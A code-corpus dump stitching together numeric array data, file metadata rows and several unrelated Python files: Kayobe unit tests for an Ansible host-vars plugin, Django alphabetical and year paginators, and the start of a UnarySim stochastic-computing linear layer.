0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.001005, 0.01776, 0.006447, 0.01006, 0.002157, 0.02417, 0.02072, 0.003254, 0.0377, 0.05374, 0.003967, 0.0002952, 0.00844, 0.0043, 5.54e-05, 0.02707, 0.00423, -0.01697, 0.00434, 0.05676, 0.06003, 0.0347, 0.001046, 0.00926, 0.01049, -0.0627, 0.01298, 0.1431, 0.0001559, 0.009094, 0.187, 0.01095, -0.01541, 0.3665, -0.00465, -0.01056, 0.03467, 0.0354, -0.0007777, 0.003857, 0.004192, -0.01729, 0.00628, -0.01463, 0.00527, 0.02357, 0.01811, -0.001148, 0.01164, -0.004974], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.001609, 0.02382, 0.00747, -0.00313, -0.00281, 0.02287, 0.02364, 0.00821, 0.04337, 0.05185, -0.000975, -0.0002458, 0.003994, -0.008095, -0.00729, 0.01953, -0.00846, -0.02808, 0.002224, 0.06696, 0.0556, 0.03754, 0.00812, -0.010605, 0.01406, -0.01137, 0.02484, 0.1748, 0.01453, 0.01005, 0.2014, 0.02069, -0.01403, 0.414, -0.01129, -0.004364, 0.03293, 0.02338, 0.02945, 0.01551, -0.002079, -0.02574, 0.013275, -0.01345, 0.001976, 0.02455, 0.02, -0.0515, 0.01128, -0.00888], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0317, 0.02124, -0.004982, 0.02762, 0.02031, 0.02173, 0.01203, -0.006287, 0.0411, 0.05826, 0.009415, 0.01537, 0.0289, 0.01305, 0.002924, 0.0252, -0.01021, -0.01213, 
0.01398, 0.0693, 0.0526, 0.0374, -0.002583, -0.00697, 0.003109, -0.013565, 0.02042, 0.159, 0.001645, 0.01909, 0.1996, 0.013336, -0.01111, 0.4004, -0.003658, -0.01755, 0.03165, 0.03067, -0.00119, -0.010056, 0.002218, -0.01677, -0.0007806, -0.0245, 0.02072, 0.015274, 0.02147, 0.00285, 0.01942, -0.00955], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00386, 0.01595, 0.012535, 0.004463, -0.02797, 0.02428, 0.00801, 0.02425, -0.0043, 0.05978, -0.01147, -0.01912, 0.004066, -0.01234, -0.0165, 0.02487, 0.02295, -0.0287, -0.01102, 0.04608, 0.0586, 0.0364, 0.02283, 0.01475, 0.01503, -0.01415, 0.02878, 0.1348, 0.021, -0.01448, 0.147, 0.004795, -0.01901, 0.1987, -0.00921, 0.01756, 0.04214, 0.03912, 0.0313, 0.0198, -0.02455, -0.03482, 0.01421, 0.0162, -0.01028, 0.02698, 0.01881, -0.05826, -0.010025, -0.009964], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.03296, -0.00321, -0.007305, 0.01428, 0.03093, 0.02676, 0.02292, -0.02242, 0.004612, 0.05246, 0.0178, 0.02939, 0.0278, 0.02452, 0.01205, 0.03473, 0.02264, 0.00186, 0.0231, 0.05063, 0.05197, 0.03555, -0.02097, 0.005196, -0.01295, -0.01845, -0.00545, 0.0965, -0.01131, 0.02432, 0.1349, 0.008606, -0.01685, 0.205, 0.01314, -0.02454, 0.03757, 0.03366, 0.001476, -0.01037, 0.01889, -0.004696, -0.003166, -0.0384, 0.01553, 0.02367, 0.01627, -0.003408, 0.02129, -0.00808]]
[-0.0102815, -0.0158668, -0.0154823, -0.015336, -0.0148281, -0.010284, -0.01587, -0.01548, -0.015335, -0.01483]
| 17,438.863636
| 73,674
| 0.553836
| 104,237
| 383,655
| 2.038451
| 0.180617
| 0.479579
| 0.712154
| 0.940051
| 0.243192
| 0.243098
| 0.243098
| 0.243098
| 0.243098
| 0.243098
| 0
| 0.640777
| 0.135843
| 383,655
| 21
| 73,675
| 18,269.285714
| 0.000121
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
43ec63d8644e06a36d77352d2678224a18955546
| 14,895
|
py
|
Python
|
kayobe/tests/unit/plugins/action/test_kolla_ansible_host_vars.py
|
G-Research/kayobe
|
80c13e75deb4bff94c5bfe2fd79bb9beecb71873
|
[
"Apache-2.0"
] | 48
|
2018-03-08T13:34:34.000Z
|
2022-03-14T15:42:20.000Z
|
kayobe/tests/unit/plugins/action/test_kolla_ansible_host_vars.py
|
chazzrobbz/kayobe
|
5fb6362e2548afdc2ea824678e565ef81cdbcaa5
|
[
"Apache-2.0"
] | null | null | null |
kayobe/tests/unit/plugins/action/test_kolla_ansible_host_vars.py
|
chazzrobbz/kayobe
|
5fb6362e2548afdc2ea824678e565ef81cdbcaa5
|
[
"Apache-2.0"
] | 25
|
2018-04-23T07:51:31.000Z
|
2022-03-14T15:42:22.000Z
|
# Copyright (c) 2020 StackHPC Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import unittest
import jinja2
from kayobe.plugins.action import kolla_ansible_host_vars
@jinja2.contextfilter
def _net_interface(context, name):
    """Fake net_interface filter: return the '<name>_interface' variable."""
    key = name + '_interface'
    return context.get(key)
@jinja2.contextfilter
def _net_vlan(context, name):
    """Fake net_vlan filter: return the '<name>_vlan' variable."""
    key = name + '_vlan'
    return context.get(key)
@jinja2.contextfilter
def _net_select_bridges(context, names):
    """Fake filter: keep only networks whose interface name starts with 'br'."""
    bridges = []
    for candidate in names:
        interface = _net_interface(context, candidate) or ""
        if interface.startswith("br"):
            bridges.append(candidate)
    return bridges
class FakeTemplar(object):
    """Minimal stand-in for Ansible's Templar.

    Renders a template string against a fixed variable dict using a Jinja2
    environment pre-loaded with the fake network filters defined above.
    """

    # Rendered output is always a string; map these back to Python values.
    _LITERALS = {
        "None": None,
        "True": True,
        "False": False,
    }

    def __init__(self, variables):
        self.variables = variables
        self.env = jinja2.Environment()
        self.env.filters.update({
            'net_interface': _net_interface,
            'net_vlan': _net_vlan,
            'net_select_bridges': _net_select_bridges,
        })

    def template(self, string):
        """Render *string* and coerce literal None/True/False results."""
        rendered = self.env.from_string(string).render(**self.variables)
        return self._LITERALS.get(rendered, rendered)
class TestCase(unittest.TestCase):
    """Tests for the kolla_ansible_host_vars action plugin's _run method."""

    # Shared fake host variables: two networks ("foo", "bar") with their
    # interfaces and VLANs, plus the naming knobs used to derive OVS bridge
    # and patch-link names.
    variables = {
        "network_interfaces": [
            "foo",
            "bar",
        ],
        "foo_interface": "eth0",
        "foo_vlan": 1,
        "bar_interface": "eth1",
        "bar_vlan": 2,
        "network_bridge_suffix_ovs": "-ovs",
        "network_patch_prefix": "p-",
        "network_patch_suffix_ovs": "-ovs",
    }

    def _create_module(self, variables=None):
        """Build an ActionModule wired to a FakeTemplar over *variables*.

        Falls back to the class-level ``variables`` dict when none are given.
        """
        if not variables:
            variables = self.variables
        templar = FakeTemplar(variables)
        return kolla_ansible_host_vars.ActionModule(None, None, None, None,
                                                    templar, None)

    def test__run_empty_args(self):
        """No interfaces or external networks yields empty facts."""
        module = self._create_module()
        result = module._run([], [])
        expected = {
            "changed": False,
            "ansible_facts": {},
            "_ansible_facts_cacheable": False,
        }
        self.assertEqual(expected, result)

    def test__run_one_interface(self):
        """A mapped network produces its interface as a fact."""
        module = self._create_module()
        interfaces = [{
            "var_name": "kolla_foo_interface",
            "network": "foo",
            "description": "Foo network",
            "required": False,
        }]
        result = module._run(interfaces, [])
        expected = {
            "changed": False,
            "ansible_facts": {
                "kolla_foo_interface": "eth0",
            },
            "_ansible_facts_cacheable": False,
        }
        self.assertEqual(expected, result)

    def test__run_two_interfaces(self):
        """Two mapped networks each produce their interface fact."""
        module = self._create_module()
        interfaces = [{
            "var_name": "kolla_foo_interface",
            "network": "foo",
            "description": "Foo network",
            "required": False,
        }, {
            "var_name": "kolla_bar_interface",
            "network": "bar",
            "description": "Bar network",
            "required": False,
        }]
        result = module._run(interfaces, [])
        expected = {
            "changed": False,
            "ansible_facts": {
                "kolla_foo_interface": "eth0",
                "kolla_bar_interface": "eth1",
            },
            "_ansible_facts_cacheable": False,
        }
        self.assertEqual(expected, result)

    def test__run_one_with_dashes(self):
        """Dashes in interface names are converted to underscores."""
        variables = copy.deepcopy(self.variables)
        variables["foo_interface"] = "eth-0"
        module = self._create_module(variables)
        interfaces = [{
            "var_name": "kolla_foo_interface",
            "network": "foo",
            "description": "Foo network",
            "required": False,
        }]
        result = module._run(interfaces, [])
        expected = {
            "changed": False,
            "ansible_facts": {
                "kolla_foo_interface": "eth_0",
            },
            "_ansible_facts_cacheable": False,
        }
        self.assertEqual(expected, result)

    def test__run_interface_not_mapped(self):
        """A required network not mapped to the host fails with a message."""
        module = self._create_module()
        interfaces = [{
            "var_name": "kolla_baz_interface",
            "network": "baz",
            "description": "Baz network",
            "required": True,
        }]
        result = module._run(interfaces, [])
        expected = {
            "changed": False,
            "failed": True,
            "msg": ("Required network 'baz' (Baz network) is not mapped to "
                    "this host"),
        }
        self.assertEqual(expected, result)

    def test__run_interface_not_mapped_not_required(self):
        """An optional unmapped network is silently skipped."""
        module = self._create_module()
        interfaces = [{
            "var_name": "kolla_baz_interface",
            "network": "baz",
            "description": "Baz network",
            "required": False,
        }]
        result = module._run(interfaces, [])
        expected = {
            "changed": False,
            "ansible_facts": {},
            "_ansible_facts_cacheable": False,
        }
        self.assertEqual(expected, result)

    def test__run_interface_no_interface(self):
        """A required mapped network with no interface fails."""
        variables = copy.deepcopy(self.variables)
        del variables["bar_interface"]
        module = self._create_module(variables)
        interfaces = [{
            "var_name": "kolla_bar_interface",
            "network": "bar",
            "description": "Bar network",
            "required": True,
        }]
        result = module._run(interfaces, [])
        expected = {
            "changed": False,
            "failed": True,
            "msg": ("Required network 'bar' (Bar network) does not have an "
                    "interface configured for this host"),
        }
        self.assertEqual(expected, result)

    def test__run_interface_no_interface_not_required(self):
        """An optional network without an interface is silently skipped."""
        variables = copy.deepcopy(self.variables)
        del variables["bar_interface"]
        module = self._create_module(variables)
        interfaces = [{
            "var_name": "kolla_bar_interface",
            "network": "bar",
            "description": "Bar network",
            "required": False,
        }]
        result = module._run(interfaces, [])
        expected = {
            "changed": False,
            "ansible_facts": {},
            "_ansible_facts_cacheable": False,
        }
        self.assertEqual(expected, result)

    def test__run_interface_no_interface_not_mapped(self):
        """Multiple failures are combined into one semicolon-joined message."""
        variables = copy.deepcopy(self.variables)
        del variables["bar_interface"]
        module = self._create_module(variables)
        interfaces = [{
            "var_name": "kolla_bar_interface",
            "network": "bar",
            "description": "Bar network",
            "required": True,
        }, {
            "var_name": "kolla_baz_interface",
            "network": "baz",
            "description": "Baz network",
            "required": True,
        }]
        result = module._run(interfaces, [])
        expected = {
            "changed": False,
            "failed": True,
            "msg": ("Required network 'bar' (Bar network) does not have an "
                    "interface configured for this host; Required network "
                    "'baz' (Baz network) is not mapped to this host"),
        }
        self.assertEqual(expected, result)

    def test_run_external_networks_one(self):
        """One external network yields bridge and interface facts."""
        module = self._create_module()
        external_networks = [{
            "network": "foo",
            "required": False,
        }]
        result = module._run([], external_networks)
        expected = {
            "changed": False,
            "ansible_facts": {
                "kolla_neutron_bridge_names": "eth0-ovs",
                "kolla_neutron_external_interfaces": "eth0",
            },
            "_ansible_facts_cacheable": False,
        }
        self.assertEqual(expected, result)

    def test_run_external_networks_two(self):
        """Two external networks yield comma-separated facts."""
        module = self._create_module()
        external_networks = [{
            "network": "foo",
            "required": False,
        }, {
            "network": "bar",
            "required": False,
        }]
        result = module._run([], external_networks)
        expected = {
            "changed": False,
            "ansible_facts": {
                "kolla_neutron_bridge_names": "eth0-ovs,eth1-ovs",
                "kolla_neutron_external_interfaces": "eth0,eth1",
            },
            "_ansible_facts_cacheable": False,
        }
        self.assertEqual(expected, result)

    def test_run_external_networks_two_same_interface(self):
        """Networks sharing an interface are deduplicated in the facts."""
        variables = copy.deepcopy(self.variables)
        variables["bar_interface"] = "eth0"
        module = self._create_module(variables)
        external_networks = [{
            "network": "foo",
            "required": False,
        }, {
            "network": "bar",
            "required": False,
        }]
        result = module._run([], external_networks)
        expected = {
            "changed": False,
            "ansible_facts": {
                "kolla_neutron_bridge_names": "eth0-ovs",
                "kolla_neutron_external_interfaces": "eth0",
            },
            "_ansible_facts_cacheable": False,
        }
        self.assertEqual(expected, result)

    def test_run_external_networks_two_vlans(self):
        """VLAN subinterfaces on the same parent collapse to the parent."""
        variables = copy.deepcopy(self.variables)
        variables["foo_interface"] = "eth0.1"
        variables["bar_interface"] = "eth0.2"
        module = self._create_module(variables)
        external_networks = [{
            "network": "foo",
            "required": False,
        }, {
            "network": "bar",
            "required": False,
        }]
        result = module._run([], external_networks)
        expected = {
            "changed": False,
            "ansible_facts": {
                "kolla_neutron_bridge_names": "eth0-ovs",
                "kolla_neutron_external_interfaces": "eth0",
            },
            "_ansible_facts_cacheable": False,
        }
        self.assertEqual(expected, result)

    def test_run_external_networks_bridge(self):
        """A bridge interface ('br' prefix) uses a patch link as interface."""
        variables = copy.deepcopy(self.variables)
        variables["foo_interface"] = "breth0"
        module = self._create_module(variables)
        external_networks = [{
            "network": "foo",
            "required": False,
        }]
        result = module._run([], external_networks)
        expected = {
            "changed": False,
            "ansible_facts": {
                "kolla_neutron_bridge_names": "breth0-ovs",
                "kolla_neutron_external_interfaces": "p-breth0-ovs",
            },
            "_ansible_facts_cacheable": False,
        }
        self.assertEqual(expected, result)

    def test_run_external_networks_bridge_vlan(self):
        """A VLAN on a bridge interface collapses to the bridge's patch."""
        variables = copy.deepcopy(self.variables)
        variables["foo_interface"] = "breth0.1"
        variables["bar_interface"] = "breth0"
        module = self._create_module(variables)
        external_networks = [{
            "network": "foo",
            "required": False,
        }]
        result = module._run([], external_networks)
        expected = {
            "changed": False,
            "ansible_facts": {
                "kolla_neutron_bridge_names": "breth0-ovs",
                "kolla_neutron_external_interfaces": "p-breth0-ovs",
            },
            "_ansible_facts_cacheable": False,
        }
        self.assertEqual(expected, result)

    def test_run_external_networks_not_mapped(self):
        """A required external network not mapped to the host fails."""
        module = self._create_module()
        external_networks = [{
            "network": "baz",
            "required": True,
        }]
        result = module._run([], external_networks)
        expected = {
            "changed": False,
            "failed": True,
            "msg": ("Required external network 'baz' is not mapped to "
                    "this host"),
        }
        self.assertEqual(expected, result)

    def test_run_external_networks_not_mapped_not_required(self):
        """An optional unmapped external network is silently skipped."""
        module = self._create_module()
        external_networks = [{
            "network": "baz",
            "required": False,
        }]
        result = module._run([], external_networks)
        expected = {
            "changed": False,
            "ansible_facts": {},
            "_ansible_facts_cacheable": False,
        }
        self.assertEqual(expected, result)

    def test_run_external_networks_no_interface(self):
        """A required external network with no interface fails."""
        variables = copy.deepcopy(self.variables)
        del variables["bar_interface"]
        module = self._create_module(variables)
        external_networks = [{
            "network": "bar",
            "required": True,
        }]
        result = module._run([], external_networks)
        expected = {
            "changed": False,
            "failed": True,
            "msg": ("Required external network 'bar' does not have an "
                    "interface configured for this host"),
        }
        self.assertEqual(expected, result)

    def test_run_external_networks_no_interface_not_required(self):
        """An optional external network without an interface is skipped."""
        variables = copy.deepcopy(self.variables)
        del variables["bar_interface"]
        module = self._create_module(variables)
        external_networks = [{
            "network": "bar",
            "required": False,
        }]
        result = module._run([], external_networks)
        expected = {
            "changed": False,
            "ansible_facts": {},
            "_ansible_facts_cacheable": False,
        }
        self.assertEqual(expected, result)

    def test_run_external_networks_not_mapped_no_interface(self):
        """Multiple external network failures combine into one message."""
        variables = copy.deepcopy(self.variables)
        del variables["bar_interface"]
        module = self._create_module(variables)
        external_networks = [{
            "network": "baz",
            "required": True,
        }, {
            "network": "bar",
            "required": True,
        }]
        result = module._run([], external_networks)
        expected = {
            "changed": False,
            "failed": True,
            "msg": ("Required external network 'baz' is not mapped to "
                    "this host; Required external network 'bar' does not "
                    "have an interface configured for this host"),
        }
        self.assertEqual(expected, result)
| 33.026608
| 76
| 0.551326
| 1,364
| 14,895
| 5.741202
| 0.113636
| 0.067424
| 0.053378
| 0.056187
| 0.800664
| 0.797344
| 0.782786
| 0.775635
| 0.775635
| 0.753799
| 0
| 0.004534
| 0.333602
| 14,895
| 450
| 77
| 33.1
| 0.784405
| 0.037261
| 0
| 0.7175
| 0
| 0
| 0.225115
| 0.051585
| 0
| 0
| 0
| 0
| 0.05
| 1
| 0.065
| false
| 0
| 0.01
| 0.0075
| 0.095
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43ef42922307dc7176868d049c72805c8ccffe39
| 7,165
|
py
|
Python
|
crossref/paginators.py
|
SSJenny90/django-publications
|
6ca302a6384c60cd161755fe6c757a4412101e99
|
[
"MIT"
] | null | null | null |
crossref/paginators.py
|
SSJenny90/django-publications
|
6ca302a6384c60cd161755fe6c757a4412101e99
|
[
"MIT"
] | null | null | null |
crossref/paginators.py
|
SSJenny90/django-publications
|
6ca302a6384c60cd161755fe6c757a4412101e99
|
[
"MIT"
] | null | null | null |
from django.core.paginator import InvalidPage
class NamePaginator(object):
    """Paginate objects alphabetically by a string attribute.

    Objects are grouped by the upper-cased first letter of ``str(obj)`` (or
    of ``getattr(obj, on)`` when *on* is given), and the groups are packed
    into pages of roughly *per_page* items each.
    """

    def __init__(self, object_list, on=None, per_page=25):
        self.object_list = object_list
        self.count = len(object_list)
        self.pages = []

        # chunk up the objects so we don't need to iterate over the whole
        # list for each letter
        chunks = {}
        for obj in self.object_list:
            if on:
                obj_str = str(getattr(obj, on))
            else:
                obj_str = str(obj)
            # BUG FIX: previously the *whole* string was upper-cased and used
            # as the grouping key, so every distinct name got its own chunk.
            # Group by the first letter, as the "A-F"-style page labels and
            # the surrounding comments imply.  Empty strings group under "".
            letter = obj_str[0].upper() if obj_str else ""
            chunks.setdefault(letter, []).append(obj)

        # Pack the per-letter chunks into pages of roughly per_page items.
        # (The old dead "if num not in chunks" branch could never fire while
        # iterating chunks.keys(); it has been removed.)
        current_page = NamePage(self)
        for letter, sub_list in chunks.items():
            new_page_count = len(sub_list) + current_page.count
            # Start a new page when adding this chunk would overflow,
            # an underflow is closer to per_page than the overflow would be,
            # and the current page is not empty (a single chunk may exceed
            # per_page on its own).
            if (new_page_count > per_page
                    and abs(per_page - current_page.count)
                        < abs(per_page - new_page_count)
                    and current_page.count > 0):
                self.pages.append(current_page)
                current_page = NamePage(self)
            current_page.add(sub_list, letter)

        # If we finished the loop with a non-empty page, add it.
        if current_page.count > 0:
            self.pages.append(current_page)

    def page(self, num):
        """Return the NamePage for the given 1-based page number.

        Returns None when there are no pages; raises InvalidPage for an
        out-of-range number.
        """
        if len(self.pages) == 0:
            return None
        elif num > 0 and num <= len(self.pages):
            return self.pages[num - 1]
        else:
            raise InvalidPage

    @property
    def num_pages(self):
        """Returns the total number of pages"""
        return len(self.pages)
class NamePage(object):
    """One page of a NamePaginator: a slice of objects plus their letters."""

    def __init__(self, paginator):
        self.paginator = paginator
        self.object_list = []
        self.letters = []

    @property
    def count(self):
        """Number of objects on this page."""
        return len(self.object_list)

    @property
    def start_letter(self):
        """Alphabetically first letter on the page, or None when empty."""
        if not self.letters:
            return None
        self.letters.sort(key=str.upper)
        return self.letters[0]

    @property
    def end_letter(self):
        """Alphabetically last letter on the page, or None when empty."""
        if not self.letters:
            return None
        self.letters.sort(key=str.upper)
        return self.letters[-1]

    @property
    def number(self):
        """1-based position of this page within its paginator."""
        return self.paginator.pages.index(self) + 1

    def add(self, new_list, letter=None):
        """Append *new_list* to the page, recording *letter* when given."""
        if not new_list:
            return
        self.object_list = self.object_list + new_list
        if letter:
            self.letters.append(letter)

    def __repr__(self):
        if self.start_letter != self.end_letter:
            return f'{self.start_letter}-{self.end_letter}'
        return str(self.start_letter)
class YearPaginator(object):
    """Paginate a queryset by a (possibly related) date attribute.

    *on* is a Django-style ``__``-separated attribute path (e.g.
    ``"date__year"``); objects sharing the same resolved value are grouped
    together and the groups are packed into pages of roughly *per_page*
    items each.
    """

    def __init__(self, object_list, on=None, per_page=25):
        self.object_list = object_list
        # object_list is expected to be a queryset-like object with .count().
        self.count = object_list.count()
        self.pages = []

        # chunk up the objects so we don't need to iterate over the whole
        # list for each value
        chunks = {}
        for obj in self.object_list:
            # BUG FIX: the attribute path was previously resolved against
            # *obj* at every step (so "date__year" did getattr(obj, "year")),
            # which only worked for single-component paths.  Follow the path
            # through related objects instead.
            value = obj
            for attr in on.split('__'):
                value = getattr(value, attr)
            chunks.setdefault(value, []).append(obj)

        # Pack the per-value chunks into pages of roughly per_page items.
        # (The old dead "if num not in chunks" branch could never fire while
        # iterating chunks.keys(); it has been removed.)
        current_page = YearPage(self)
        for value, sub_list in chunks.items():
            new_page_count = len(sub_list) + current_page.count
            # Start a new page when adding this chunk would overflow,
            # an underflow is closer to per_page than the overflow would be,
            # and the current page is not empty (a single chunk may exceed
            # per_page on its own).
            if (new_page_count > per_page
                    and abs(per_page - current_page.count)
                        < abs(per_page - new_page_count)
                    and current_page.count > 0):
                self.pages.append(current_page)
                current_page = YearPage(self)
            current_page.add(sub_list, value)

        # If we finished the loop with a non-empty page, add it.
        if current_page.count > 0:
            self.pages.append(current_page)

    def page(self, num):
        """Return the YearPage for the given 1-based page number.

        Returns None when there are no pages; raises InvalidPage for an
        out-of-range number.
        """
        if len(self.pages) == 0:
            return None
        elif num > 0 and num <= len(self.pages):
            return self.pages[num - 1]
        else:
            raise InvalidPage

    @property
    def num_pages(self):
        """Returns the total number of pages"""
        return len(self.pages)
class YearPage(object):
    """One page of a YearPaginator: a slice of objects plus their year keys."""

    def __init__(self, paginator):
        self.paginator = paginator
        self.object_list = []
        self.letters = []

    @property
    def count(self):
        """Number of objects on this page."""
        return len(self.object_list)

    @property
    def start_letter(self):
        # First key added to this page.  Unlike NamePage, keys are kept in
        # insertion order (the sort is deliberately disabled here).
        return self.letters[0] if self.letters else None

    @property
    def end_letter(self):
        # Last key added to this page (insertion order, no sorting).
        return self.letters[-1] if self.letters else None

    @property
    def number(self):
        """1-based position of this page within its paginator."""
        return self.paginator.pages.index(self) + 1

    def add(self, new_list, letter=None):
        """Append *new_list* to the page, recording *letter* when given."""
        if not new_list:
            return
        self.object_list = self.object_list + new_list
        if letter:
            self.letters.append(letter)

    def __repr__(self):
        if self.start_letter == self.end_letter:
            return str(self.start_letter)
        # NOTE(review): label is rendered end-first, the reverse of NamePage —
        # presumably intentional for year ranges; confirm with the templates.
        return f'{self.end_letter}-{self.start_letter}'
| 32.568182
| 94
| 0.547802
| 896
| 7,165
| 4.241071
| 0.135045
| 0.052632
| 0.051579
| 0.017895
| 0.923158
| 0.914737
| 0.908421
| 0.908421
| 0.908421
| 0.908421
| 0
| 0.006132
| 0.362736
| 7,165
| 220
| 95
| 32.568182
| 0.826106
| 0.20963
| 0
| 0.888112
| 0
| 0
| 0.013542
| 0.013186
| 0
| 0
| 0
| 0
| 0
| 1
| 0.13986
| false
| 0
| 0.006993
| 0.027972
| 0.300699
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a10a48b14362db67789974efa63c236cc30ed241
| 69
|
py
|
Python
|
tests/tests_unit/test_api/relative_imports/bad_relative_import.py
|
AlexThunder/cognite-sdk-python-experimental
|
468d29e7809793ed45cef5da25dca22418839972
|
[
"Apache-2.0"
] | null | null | null |
tests/tests_unit/test_api/relative_imports/bad_relative_import.py
|
AlexThunder/cognite-sdk-python-experimental
|
468d29e7809793ed45cef5da25dca22418839972
|
[
"Apache-2.0"
] | null | null | null |
tests/tests_unit/test_api/relative_imports/bad_relative_import.py
|
AlexThunder/cognite-sdk-python-experimental
|
468d29e7809793ed45cef5da25dca22418839972
|
[
"Apache-2.0"
] | null | null | null |
from .util import local_func
def handle():
    """Entry point: delegate to the relatively-imported helper."""
    result = local_func()
    return result
| 11.5
| 28
| 0.710145
| 10
| 69
| 4.7
| 0.8
| 0.382979
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.202899
| 69
| 5
| 29
| 13.8
| 0.854545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
a19e724b69f9674dac3392aa6ae485efccdb86dd
| 25,639
|
py
|
Python
|
sw/kernel/linear.py
|
libingzheren/UnarySim
|
226c46a4ddce2fbb71395e8fd8decff768dc3742
|
[
"MIT"
] | 1
|
2021-08-04T10:33:06.000Z
|
2021-08-04T10:33:06.000Z
|
sw/kernel/linear.py
|
libingzheren/Stochastic_Computing
|
c02461454618e9ce0c86ce695fad9e95d1ca5e00
|
[
"MIT"
] | null | null | null |
sw/kernel/linear.py
|
libingzheren/Stochastic_Computing
|
c02461454618e9ce0c86ce695fad9e95d1ca5e00
|
[
"MIT"
] | null | null | null |
import torch
import math
from UnarySim.sw.stream.gen import RNG, RNGMulti, SourceGen, BSGen, BSGenMulti
class UnaryLinear(torch.nn.Module):
"""
this module is the fully connected layer,
its API is similar to the parent class (input/output feature count, bias flag), except:
1) accumulation mode
2) unary data mode
3) binary data width
4) binary weight
5) binary bias
"""
def __init__(self,
in_features,
out_features,
binary_weight=None,
binary_bias=None,
bitwidth=8,
bias=True,
mode="bipolar",
scaled=True,
btype=torch.float,
rtype=torch.float,
stype=torch.float):
super(UnaryLinear, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.stype = stype
self.btype = btype
self.rtype = rtype
# upper bound for accumulation counter in scaled mode
self.acc_bound = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
self.acc_bound.add_(in_features)
if bias is True:
self.acc_bound.add_(1)
self.mode = mode
self.scaled = scaled
# accumulation offset
self.offset = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
if mode is "unipolar":
pass
elif mode is "bipolar":
self.offset.add_((in_features-1)/2)
if bias is True:
self.offset.add_(1/2)
else:
